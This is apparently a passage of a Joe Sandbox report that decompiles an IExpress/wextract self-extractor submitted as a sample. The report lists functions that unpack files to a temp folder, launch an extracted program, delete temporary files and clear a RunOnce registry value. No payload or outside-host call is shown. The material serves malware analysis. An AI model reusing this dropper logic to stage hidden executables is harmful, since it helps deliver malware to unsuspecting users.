                                                                        							_t14 = 1;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					L4:
                                                                        					 *0xf89124 = E00F86285();
                                                                        					_t14 = 0;
                                                                        				}
                                                                        				return _t14;
                                                                        			}














                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F858E7
                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85943
                                                                        • LocalFree.KERNEL32(00000000,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8594D
                                                                        • CloseHandle.KERNEL32(00000000,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F8595C
                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,00F85534,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00F85963
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                        • API String ID: 747627703-908790857
                                                                        • Opcode ID: 890e09afecfe78b68075f32006557d0b0a2e9def032f2f2e1a2faf55e33f3324
                                                                        • Instruction ID: 51b37ddd8d63077803ca8cf1a18652c6ccbfc02d8de643a8a774e3ff36a2d210
                                                                        • Opcode Fuzzy Hash: 890e09afecfe78b68075f32006557d0b0a2e9def032f2f2e1a2faf55e33f3324
                                                                        • Instruction Fuzzy Hash: 1E113831B0061467DB207FB95C4DBEB7E9DEF45770B100616F505D31D1DA74D806A7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 631 f83fef-f84010 632 f8410a-f8411a call f86ce0 631->632 633 f84016-f8403b CreateProcessA 631->633 635 f84041-f8406e WaitForSingleObject GetExitCodeProcess 633->635 636 f840c4-f84101 call f86285 GetLastError FormatMessageA call f844b9 633->636 637 f84070-f84077 635->637 638 f84091 call f8411b 635->638 650 f84106 636->650 637->638 641 f84079-f8407b 637->641 645 f84096-f840b8 CloseHandle * 2 638->645 641->638 644 f8407d-f84089 641->644 644->638 647 f8408b 644->647 648 f84108 645->648 649 f840ba-f840c0 645->649 647->638 648->632 649->648 651 f840c2 649->651 650->648 651->650
                                                                        C-Code - Quality: 84%
                                                                        			E00F83FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v524;
                                                                        				long _v528;
                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t20;
                                                                        				void* _t22;
                                                                        				int _t25;
                                                                        				intOrPtr* _t39;
                                                                        				signed int _t44;
                                                                        				void* _t49;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t20 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t20 ^ _t50;
                                                                        				_t39 = __ecx;
                                                                        				_t49 = 1;
                                                                        				_t22 = 0;
                                                                        				if(__ecx == 0) {
                                                                        					L13:
                                                                        					return E00F86CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                        				}
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                        				if(_t25 == 0) {
                                                                        					 *0xf89124 = E00F86285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                        					_t45 = 0x4c4;
                                                                        					E00F844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                        					L11:
                                                                        					_t49 = 0;
                                                                        					L12:
                                                                        					_t22 = _t49;
                                                                        					goto L13;
                                                                        				}
                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                        				_t44 = _v528;
                                                                        				_t53 =  *0xf88a28; // 0x0
                                                                        				if(_t53 == 0) {
                                                                        					_t34 =  *0xf89a2c; // 0x0
                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                        						_t34 = _t44 & 0xff000000;
                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                        							 *0xf89a2c = _t44;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				E00F8411B(_t34, _t44);
                                                                        				CloseHandle(_v544.hThread);
                                                                        				CloseHandle(_v544);
                                                                        				if(( *0xf89a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L11;
                                                                        				}
                                                                        			}


















                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00F84033
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F84049
                                                                        • GetExitCodeProcess.KERNELBASE ref: 00F8405C
                                                                        • CloseHandle.KERNEL32(?), ref: 00F8409C
                                                                        • CloseHandle.KERNEL32(?), ref: 00F840A8
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00F840DC
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00F840E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                        • String ID:
                                                                        • API String ID: 3183975587-0
                                                                        • Opcode ID: cdcebd515a4a9028288cdbcd648a4c7148802f9973102e15d75e420f1072a7e1
                                                                        • Instruction ID: 199093de1051b3df53d0adc137158c5def39e71106483e3b0d0d6270f1add08a
                                                                        • Opcode Fuzzy Hash: cdcebd515a4a9028288cdbcd648a4c7148802f9973102e15d75e420f1072a7e1
                                                                        • Instruction Fuzzy Hash: A831AE31A4061CABEB21AB65DC4DFFB777CEB94711F1001AAFA05E21A1CA345D85EF21
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 652 f851e5-f8520b call f8468f LocalAlloc 655 f8522d-f8523c call f8468f 652->655 656 f8520d-f85228 call f844b9 call f86285 652->656 662 f8523e-f85260 call f844b9 LocalFree 655->662 663 f85262-f85270 lstrcmpA 655->663 668 f852b0 656->668 662->668 666 f8527e-f8529c call f844b9 LocalFree 663->666 667 f85272-f85273 LocalFree 663->667 674 f8529e-f852a4 666->674 675 f852a6 666->675 670 f85279-f8527c 667->670 673 f852b2-f852b5 668->673 670->673 674->670 675->668
                                                                        C-Code - Quality: 100%
                                                                        			E00F851E5(void* __eflags) {
                                                                        				int _t5;
                                                                        				void* _t6;
                                                                        				void* _t28;
                                                                        
                                                                        				_t1 = E00F8468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                        				if(_t28 != 0) {
                                                                        					if(E00F8468F("UPROMPT", _t28, _t29) != 0) {
                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                        						if(_t5 != 0) {
                                                                        							_t6 = E00F844B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                        							LocalFree(_t28);
                                                                        							if(_t6 != 6) {
                                                                        								 *0xf89124 = 0x800704c7;
                                                                        								L10:
                                                                        								return 0;
                                                                        							}
                                                                        							 *0xf89124 = 0;
                                                                        							L6:
                                                                        							return 1;
                                                                        						}
                                                                        						LocalFree(_t28);
                                                                        						goto L6;
                                                                        					}
                                                                        					E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree(_t28);
                                                                        					 *0xf89124 = 0x80070714;
                                                                        					goto L10;
                                                                        				}
                                                                        				E00F844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0xf89124 = E00F86285();
                                                                        				goto L10;
                                                                        			}






                                                                        APIs
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F4D,?,00000002,00000000), ref: 00F85201
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00F85250
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                          • Part of subcall function 00F86285: GetLastError.KERNEL32(00F85BBC), ref: 00F86285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$UPROMPT
                                                                        • API String ID: 957408736-2980973527
                                                                        • Opcode ID: 92c475a7174f68f1b73238ce3965e552744e114811dd947469d68241c9a0b298
                                                                        • Instruction ID: 80fe45499ac5be4e62e27504f42fdaa6b792f037b3edd6d83b8da152c9a7424e
                                                                        • Opcode Fuzzy Hash: 92c475a7174f68f1b73238ce3965e552744e114811dd947469d68241c9a0b298
                                                                        • Instruction Fuzzy Hash: 9B110872704605ABE714BBB15C8AFFB719DEB89B50B104429FA02D5190EEBC9C017325
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E00F852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t9;
                                                                        				signed int _t11;
                                                                        				void* _t21;
                                                                        				void* _t29;
                                                                        				CHAR** _t31;
                                                                        				void* _t32;
                                                                        				signed int _t33;
                                                                        
                                                                        				_t28 = __edi;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t9 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t9 ^ _t33;
                                                                        				_push(__esi);
                                                                        				_t31 =  *0xf891e0; // 0x33d7bf0
                                                                        				if(_t31 != 0) {
                                                                        					_push(__edi);
                                                                        					do {
                                                                        						_t29 = _t31;
                                                                        						if( *0xf88a24 == 0 &&  *0xf89a30 == 0) {
                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                        							DeleteFileA( *_t31); // executed
                                                                        						}
                                                                        						_t31 = _t31[1];
                                                                        						LocalFree( *_t29);
                                                                        						LocalFree(_t29);
                                                                        					} while (_t31 != 0);
                                                                        					_pop(_t28);
                                                                        				}
                                                                        				_t11 =  *0xf88a20; // 0x0
                                                                        				_pop(_t32);
                                                                        				if(_t11 != 0 &&  *0xf88a24 == 0 &&  *0xf89a30 == 0) {
                                                                        					_push(_t22);
                                                                        					E00F81781( &_v268, 0x104, _t22, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        					if(( *0xf89a34 & 0x00000020) != 0) {
                                                                        						E00F865E8( &_v268);
                                                                        					}
                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                        					_t22 =  &_v268;
                                                                        					E00F82390( &_v268);
                                                                        					_t11 =  *0xf88a20; // 0x0
                                                                        				}
                                                                        				if( *0xf89a40 != 1 && _t11 != 0) {
                                                                        					_t11 = E00F81FE1(_t22); // executed
                                                                        				}
                                                                        				 *0xf88a20 =  *0xf88a20 & 0x00000000;
                                                                        				return E00F86CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                        			}


                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(033D7BF0,00000080,?,00000000), ref: 00F852F2
                                                                        • DeleteFileA.KERNELBASE(033D7BF0), ref: 00F852FA
                                                                        • LocalFree.KERNEL32(033D7BF0,?,00000000), ref: 00F85305
                                                                        • LocalFree.KERNEL32(033D7BF0), ref: 00F8530C
                                                                        • SetCurrentDirectoryA.KERNELBASE(00F811FC,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F85363
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\, xrefs: 00F85334
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 2833751637-3217841213
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F81FE1(void* __ecx) {
                                                                        				void* _v8;
                                                                        				long _t4;
                                                                        
                                                                        				if( *0xf88530 != 0) {
                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                        					if(_t4 == 0) {
                                                                        						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                        						return RegCloseKey(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t4;
                                                                        			}


                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00F8538C,?,?,00F8538C), ref: 00F82005
                                                                        • RegDeleteValueA.KERNELBASE(00F8538C,wextract_cleanup1,?,?,00F8538C), ref: 00F82017
                                                                        • RegCloseKey.ADVAPI32(00F8538C,?,?,00F8538C), ref: 00F82020
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                        • API String ID: 849931509-1592051331
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E00F84CD0(char* __edx, long _a4, int _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				long _t32;
                                                                        				signed int _t33;
                                                                        				long _t35;
                                                                        				long _t36;
                                                                        				struct HWND__* _t37;
                                                                        				long _t38;
                                                                        				long _t39;
                                                                        				long _t41;
                                                                        				long _t44;
                                                                        				long _t45;
                                                                        				long _t46;
                                                                        				signed int _t50;
                                                                        				long _t51;
                                                                        				char* _t58;
                                                                        				long _t59;
                                                                        				char* _t63;
                                                                        				long _t64;
                                                                        				CHAR* _t71;
                                                                        				CHAR* _t74;
                                                                        				int _t75;
                                                                        				signed int _t76;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_t29 =  *0xf88004; // 0x7e92e7a6
                                                                        				_t30 = _t29 ^ _t76;
                                                                        				_v8 = _t30;
                                                                        				_t75 = _a8;
                                                                        				if( *0xf891d8 == 0) {
                                                                        					_t32 = _a4;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 == 0) {
                                                                        						_t33 = E00F84E99(_t75);
                                                                        						L35:
                                                                        						return E00F86CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                        					}
                                                                        					_t35 = _t32 - 1;
                                                                        					__eflags = _t35;
                                                                        					if(_t35 == 0) {
                                                                        						L9:
                                                                        						_t33 = 0;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t36 = _t35 - 1;
                                                                        					__eflags = _t36;
                                                                        					if(_t36 == 0) {
                                                                        						_t37 =  *0xf88584; // 0x0
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                        						}
                                                                        						_t54 = 0xf891e4;
                                                                        						_t58 = 0xf891e4;
                                                                        						do {
                                                                        							_t38 =  *_t58;
                                                                        							_t58 =  &(_t58[1]);
                                                                        							__eflags = _t38;
                                                                        						} while (_t38 != 0);
                                                                        						_t59 = _t58 - 0xf891e5;
                                                                        						__eflags = _t59;
                                                                        						_t71 =  *(_t75 + 4);
                                                                        						_t73 =  &(_t71[1]);
                                                                        						do {
                                                                        							_t39 =  *_t71;
                                                                        							_t71 =  &(_t71[1]);
                                                                        							__eflags = _t39;
                                                                        						} while (_t39 != 0);
                                                                        						_t69 = _t71 - _t73;
                                                                        						_t30 = _t59 + 1 + _t71 - _t73;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							L3:
                                                                        							_t33 = _t30 | 0xffffffff;
                                                                        							goto L35;
                                                                        						}
                                                                        						_t69 = 0xf891e4;
                                                                        						_t30 = E00F84702( &_v268, 0xf891e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t41 = E00F8476D( &_v268, __eflags);
                                                                        						__eflags = _t41;
                                                                        						if(_t41 == 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_push(0x180);
                                                                        						_t30 = E00F84980( &_v268, 0x8302); // executed
                                                                        						_t75 = _t30;
                                                                        						__eflags = _t75 - 0xffffffff;
                                                                        						if(_t75 == 0xffffffff) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t30 = E00F847E0( &_v268);
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						 *0xf893f4 =  *0xf893f4 + 1;
                                                                        						_t33 = _t75;
                                                                        						goto L35;
                                                                        					}
                                                                        					_t44 = _t36 - 1;
                                                                        					__eflags = _t44;
                                                                        					if(_t44 == 0) {
                                                                        						_t54 = 0xf891e4;
                                                                        						_t63 = 0xf891e4;
                                                                        						do {
                                                                        							_t45 =  *_t63;
                                                                        							_t63 =  &(_t63[1]);
                                                                        							__eflags = _t45;
                                                                        						} while (_t45 != 0);
                                                                        						_t74 =  *(_t75 + 4);
                                                                        						_t64 = _t63 - 0xf891e5;
                                                                        						__eflags = _t64;
                                                                        						_t69 =  &(_t74[1]);
                                                                        						do {
                                                                        							_t46 =  *_t74;
                                                                        							_t74 =  &(_t74[1]);
                                                                        							__eflags = _t46;
                                                                        						} while (_t46 != 0);
                                                                        						_t73 = _t74 - _t69;
                                                                        						_t30 = _t64 + 1 + _t74 - _t69;
                                                                        						__eflags = _t30 - 0x104;
                                                                        						if(_t30 >= 0x104) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 = 0xf891e4;
                                                                        						_t30 = E00F84702( &_v268, 0xf891e4,  *(_t75 + 4));
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                        						_t30 = E00F84C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						E00F84B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                        						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                        						__eflags = _t50;
                                                                        						if(_t50 != 0) {
                                                                        							_t51 = _t50 & 0x00000027;
                                                                        							__eflags = _t51;
                                                                        						} else {
                                                                        							_t51 = 0x80;
                                                                        						}
                                                                        						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                        						__eflags = _t30;
                                                                        						if(_t30 == 0) {
                                                                        							goto L3;
                                                                        						} else {
                                                                        							_t33 = 1;
                                                                        							goto L35;
                                                                        						}
                                                                        					}
                                                                        					_t30 = _t44 - 1;
                                                                        					__eflags = _t30;
                                                                        					if(_t30 == 0) {
                                                                        						goto L3;
                                                                        					}
                                                                        					goto L9;
                                                                        				}
                                                                        				if(_a4 == 3) {
                                                                        					_t30 = E00F84B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                        				}
                                                                        				goto L3;
                                                                        			}


                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00F84DB5
                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00F84DDD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFileItemText
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\
                                                                        • API String ID: 3625706803-3217841213
                                                                        • Opcode ID: 814f8040a26017a064595373696bfcd2468628d73580d56071caa2167e531673
                                                                        • Instruction ID: 766fdcfe5aba5d4932fec2f4807479affe6b93ece791b8edbcd2169f37f7fd84
                                                                        • Opcode Fuzzy Hash: 814f8040a26017a064595373696bfcd2468628d73580d56071caa2167e531673
                                                                        • Instruction Fuzzy Hash: 1241F337A041079BCF25BF28DD486F973A5EB45320F084669E88297285DA35FE4AF750
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F84C37(signed int __ecx, int __edx, int _a4) {
                                                                        				struct _FILETIME _v12;
                                                                        				struct _FILETIME _v20;
                                                                        				FILETIME* _t14;
                                                                        				int _t15;
                                                                        				signed int _t21;
                                                                        
                                                                        				_t21 = __ecx * 0x18;
                                                                        				if( *((intOrPtr*)(_t21 + 0xf88d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t14 =  &_v12;
                                                                        					_t15 = SetFileTime( *(_t21 + 0xf88d74), _t14, _t14, _t14); // executed
                                                                        					if(_t15 == 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					return 1;
                                                                        				}
                                                                        			}









                                                                        APIs
                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00F84C54
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F84C66
                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00F84C7E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Time$File$DateLocal
                                                                        • String ID:
                                                                        • API String ID: 2071732420-0
                                                                        • Opcode ID: e4f816d0b92fbdfeb0de217be8ba7fcf52820916e8ed8cda9847e2ac71853c78
                                                                        • Instruction ID: 35dd3069a43dfde606291448e465da8e6c913a1a7a62e06b04a6584ebb1aabce
                                                                        • Opcode Fuzzy Hash: e4f816d0b92fbdfeb0de217be8ba7fcf52820916e8ed8cda9847e2ac71853c78
                                                                        • Instruction Fuzzy Hash: 0FF03072A0120EAFAB25EFB5CC49DFB77ADEB05250B44452BB915C1051EA30E914FBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E00F8487A(CHAR* __ecx, signed int __edx) {
                                                                        				void* _t7;
                                                                        				CHAR* _t11;
                                                                        				long _t18;
                                                                        				long _t23;
                                                                        
                                                                        				_t11 = __ecx;
                                                                        				asm("sbb edi, edi");
                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                        				if((__edx & 0x00000100) == 0) {
                                                                        					asm("sbb esi, esi");
